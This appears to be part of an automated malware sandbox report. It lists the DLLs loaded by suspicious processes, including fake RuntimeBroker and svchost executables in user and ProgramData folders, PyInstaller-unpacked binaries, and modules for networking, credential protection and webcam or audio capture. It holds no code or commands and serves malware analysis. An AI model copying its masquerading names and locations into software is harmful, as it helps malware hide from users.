Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: websocket.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: vcruntime140.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: python3.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libffi-7.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sqlite3.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libcrypto-1_1.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libssl-1_1.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avicap32.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msvfw32.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmm.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmm.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dciman32.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mmdevapi.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: devobj.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: ksuser.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avrt.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: audioses.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: powrprof.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: umpdc.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: midimap.dll
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dpapi.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: vcruntime140.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dxgidebug.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: riched20.dll
Source: C:\ProgramData\svchost.exe	Section loaded: usp10.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msls31.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: propsys.dll
Source: C:\ProgramData\svchost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: edputil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\svchost.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: netutils.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\svchost.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\svchost.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: slc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: userenv.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sppc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: pcacli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
